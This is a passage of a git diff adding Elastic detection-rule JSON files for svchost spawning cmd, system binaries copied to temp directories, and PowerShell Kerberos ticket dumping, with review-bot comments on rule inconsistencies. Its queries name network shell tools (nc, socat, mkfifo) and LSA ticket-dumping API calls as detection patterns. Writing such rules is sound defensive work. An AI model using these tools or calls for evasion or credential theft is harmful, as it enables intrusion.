**Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:\"svchost.exe\" and process.name:(\"cmd.exe\" or \"Cmd.exe\" or \"CMD.EXE\")\n", + "references": [ + "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: 
Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 210 + }, + "id": "fd7a6052-58fa-4397-93c3-4795249ccfa2_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_211.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_211.json new file mode 100644 index 00000000000..cd98b236031 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_211.json 
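Review bot: The investigation guide in the `note` field directs the analyst to look for logon events (4624) "to the target host after the registry modification", but this rule matches a process-start event (`cmd.exe` with parent `svchost.exe`) and has no registry condition; the phrase looks carried over from a registry rule and should read `... to the target host after the suspicious process creation.` The `setup` text likewise explains the `event.ingested` fallback for "an EQL rule", while this rule is `"type": "new_terms"` with `"language": "kuery"`, so that paragraph should be reworded for new-terms rules or removed if it does not apply. Both strings appear unchanged in the `_211` copy of this rule in the next hunk (`fd7a6052-58fa-4397-93c3-4795249ccfa2_211.json`). Separately, the `process.name` match lists three spellings of the binary name, which only covers those exact cases because keyword-field matching in KQL is case-sensitive unless the index applies a normalizer; if the listed data sources provide a case-insensitive variant of the field, matching on that would close the gap.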
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious parent child process relationship with cmd.exe descending from svchost.exe", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Svchost spawning Cmd", + "new_terms_fields": [ + "host.id", + "process.command_line", + "user.id" + ], + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:\"svchost.exe\" and process.name:(\"cmd.exe\" or \"Cmd.exe\" or \"CMD.EXE\")\n", + "references": [ + "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: 
Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 211 + }, + "id": "fd7a6052-58fa-4397-93c3-4795249ccfa2_211", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_6.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_6.json new file mode 100644 index 00000000000..ed0a1112f47 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_6.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Binary Copied and/or Moved to Suspicious Directory", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.name in (\"cp\", \"mv\") and process.args : (\n // Shells\n \"/bin/*sh\", \"/usr/bin/*sh\", \n\n // Interpreters\n \"/bin/python*\", \"/usr/bin/python*\", \"/bin/php*\", \"/usr/bin/php*\", \"/bin/ruby*\", \"/usr/bin/ruby*\", \"/bin/perl*\",\n \"/usr/bin/perl*\", \"/bin/lua*\", \"/usr/bin/lua*\", \"/bin/java*\", \"/usr/bin/java*\", \n\n // Compilers\n \"/bin/gcc*\", \"/usr/bin/gcc*\", \"/bin/g++*\", \"/usr/bin/g++*\", \"/bin/cc\", \"/usr/bin/cc\",\n\n // Suspicious utilities\n \"/bin/nc\", \"/usr/bin/nc\", \"/bin/ncat\", \"/usr/bin/ncat\", \"/bin/netcat\", \"/usr/bin/netcat\", \"/bin/nc.openbsd\",\n \"/usr/bin/nc.openbsd\", \"/bin/*awk\", \"/usr/bin/*awk\", \"/bin/socat\", \"/usr/bin/socat\", \"/bin/openssl\",\n \"/usr/bin/openssl\", \"/bin/telnet\", \"/usr/bin/telnet\", \"/bin/mkfifo\", \"/usr/bin/mkfifo\", \"/bin/mknod\",\n \"/usr/bin/mknod\", \"/bin/ping*\", \"/usr/bin/ping*\", \"/bin/nmap\", \"/usr/bin/nmap\",\n\n // System utilities\n \"/bin/ls\", \"/usr/bin/ls\", \"/bin/cat\", \"/usr/bin/cat\", \"/bin/sudo\", \"/usr/bin/sudo\", \"/bin/curl\", \"/usr/bin/curl\",\n \"/bin/wget\", \"/usr/bin/wget\", \"/bin/tmux\", \"/usr/bin/tmux\", \"/bin/screen\", \"/usr/bin/screen\", \"/bin/ssh\",\n \"/usr/bin/ssh\", \"/bin/ftp\", 
\"/usr/bin/ftp\"\n ) and not process.parent.name in (\"dracut-install\", \"apticron\", \"generate-from-dir\", \"platform-python\")]\n [file where host.os.type == \"linux\" and event.action == \"creation\" and file.path : (\n \"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\", \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\"\n ) and not file.path : (\"/tmp/rear*\", \"/var/tmp/rear*\", \"/var/tmp/dracut*\", \"/var/tmp/mkinitramfs*\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_7.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_7.json new file mode 100644 index 00000000000..adf8dcfd638 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_7.json 
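Review bot: The second stage of the `query` requires `event.action == "creation"`, but the `description` says the rule covers a system binary being copied or moved; a `mv` within one filesystem is a rename rather than a new file, so whether it produces a creation event depends on how the endpoint reports renames, and the description should either state that limitation or the second stage should be widened if a rename action is available in the data. The `process.args` patterns are all absolute paths under `/bin` and `/usr/bin`, so an invocation that names the source binary by a relative path is outside the rule's coverage; a comment in the query such as `// only absolute source paths are matched` would make that boundary explicit for the next maintainer. The `_7` copy of this rule in the next hunk (`fda1d332-5e08-4f27-8a9b-8c802e3292a6_7.json`) only swaps the order of the `event.type`/`event.action` predicates and adds a `## Setup` heading, so the same observations apply there.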
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the copying or moving of a system binary to a suspicious directory. Adversaries may copy/move and rename system binaries to evade detection. Copying a system binary to a different location should not occur often, so if it does, the activity should be investigated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Binary Copied and/or Moved to Suspicious Directory", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name in (\"cp\", \"mv\") and process.args : (\n // Shells\n \"/bin/*sh\", \"/usr/bin/*sh\", \n\n // Interpreters\n \"/bin/python*\", \"/usr/bin/python*\", \"/bin/php*\", \"/usr/bin/php*\", \"/bin/ruby*\", \"/usr/bin/ruby*\", \"/bin/perl*\",\n \"/usr/bin/perl*\", \"/bin/lua*\", \"/usr/bin/lua*\", \"/bin/java*\", \"/usr/bin/java*\", \n\n // Compilers\n \"/bin/gcc*\", \"/usr/bin/gcc*\", \"/bin/g++*\", \"/usr/bin/g++*\", \"/bin/cc\", \"/usr/bin/cc\",\n\n // Suspicious utilities\n \"/bin/nc\", \"/usr/bin/nc\", \"/bin/ncat\", \"/usr/bin/ncat\", \"/bin/netcat\", \"/usr/bin/netcat\", \"/bin/nc.openbsd\",\n \"/usr/bin/nc.openbsd\", \"/bin/*awk\", \"/usr/bin/*awk\", \"/bin/socat\", \"/usr/bin/socat\", \"/bin/openssl\",\n \"/usr/bin/openssl\", \"/bin/telnet\", \"/usr/bin/telnet\", \"/bin/mkfifo\", \"/usr/bin/mkfifo\", \"/bin/mknod\",\n \"/usr/bin/mknod\", \"/bin/ping*\", \"/usr/bin/ping*\", \"/bin/nmap\", \"/usr/bin/nmap\",\n\n // System utilities\n \"/bin/ls\", \"/usr/bin/ls\", \"/bin/cat\", \"/usr/bin/cat\", \"/bin/sudo\", \"/usr/bin/sudo\", \"/bin/curl\", \"/usr/bin/curl\",\n \"/bin/wget\", \"/usr/bin/wget\", \"/bin/tmux\", \"/usr/bin/tmux\", \"/bin/screen\", \"/usr/bin/screen\", \"/bin/ssh\",\n \"/usr/bin/ssh\", \"/bin/ftp\", 
\"/usr/bin/ftp\"\n ) and not process.parent.name in (\"dracut-install\", \"apticron\", \"generate-from-dir\", \"platform-python\")]\n [file where host.os.type == \"linux\" and event.action == \"creation\" and file.path : (\n \"/dev/shm/*\", \"/run/shm/*\", \"/tmp/*\", \"/var/tmp/*\", \"/run/*\", \"/var/run/*\", \"/var/www/*\", \"/proc/*/fd/*\"\n ) and not file.path : (\"/tmp/rear*\", \"/var/tmp/rear*\", \"/var/tmp/dracut*\", \"/var/tmp/mkinitramfs*\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + }, + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "fda1d332-5e08-4f27-8a9b-8c802e3292a6_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_4.json b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_4.json new file mode 100644 index 00000000000..117cdbffcf8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fddff193-48a3-484d-8d35-90bb3d323a56_4.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that have the capability of dumping Kerberos tickets from LSA, which potentially indicates an attacker's attempt to acquire credentials for lateral movement.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Kerberos Ticket Dump", + "note": "## Triage and analysis\n\n### Investigating PowerShell Kerberos Ticket Dump\n\nKerberos is an authentication protocol that relies on tickets to grant access to network resources. Adversaries may abuse this protocol to acquire credentials for lateral movement within a network.\n\nThis rule indicates the use of scripts that contain code capable of dumping Kerberos tickets, which can indicate potential PowerShell abuse for credential theft.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate if the script was executed, and if so, which account was targeted.\n- Identify the account involved and contact the owner to confirm whether they are aware of this activity.\n- Check if the script has any other functionality that can be potentially malicious.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate other potentially compromised accounts and hosts. 
Review login events (like 4624) for suspicious events involving the subject and target accounts.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of file path and user ID conditions.\n\n### Related Rules\n\n- PowerShell Kerberos Ticket Request - eb610e70-f9e6-4949-82b9-f1c5bcd37c39\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Disable or limit involved accounts during the investigation and response.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"LsaCallAuthenticationPackage\" and\n (\n \"KerbRetrieveEncodedTicketMessage\" or\n \"KerbQueryTicketCacheMessage\" or\n \"KerbQueryTicketCacheExMessage\" or\n \"KerbQueryTicketCacheEx2Message\" or\n \"KerbRetrieveTicketMessage\" or\n \"KerbDecryptDataMessage\"\n )\n )\n", + "references": [ + "https://github.com/MzHmO/PowershellKerberos/blob/main/dumper.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "fddff193-48a3-484d-8d35-90bb3d323a56", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via 